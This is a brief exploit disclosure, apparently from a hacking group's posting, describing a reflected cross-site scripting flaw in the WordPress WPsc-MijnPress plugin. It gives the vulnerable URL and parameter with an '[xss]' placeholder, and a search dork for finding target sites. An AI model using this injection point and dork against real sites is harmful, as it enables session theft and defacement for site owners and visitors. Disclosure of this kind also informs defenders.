a bug in Wordpress WPsc-MijnPress plugin that allows to us to occur a Cross-Site Scripting on a Remote machin. ######################################################## # # Exploit Title : Wordpress WPsc-MijnPress plugin Cross-Site Scripting Vulnerabilities # # Author : #BHG Security Center - IrIsT Security Team # # Discovered By : Am!r # # Home : http://Black-hg.Org - http://IrIsT.Ir # # Software Link : http://wordpress.org/extend/plugins/wpsc-mijnpress/ # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : "Powered by Wordpress" # ######################################################## # # Expl0iTs : # # [TarGeT]/wp-content/plugins/wpsc-mijnpress/mijnpress_plugin_framework.php?rwflush=[xss] # ######################################################### # # Special Thanks To : Net.Edit0r - 3H34N - A.Cr0x - 4M!N - ArYaIeIrAN - # # G3n3rall - Mr.XHat - Bl4ck.Viper - Dj.TiniVini - B3Hz4d - Crim3R - d3c0d3r ... # ######################################################### # # GreetZ : All Active Member in #BHG Security Center & IrIsT.Ir # #########################################################
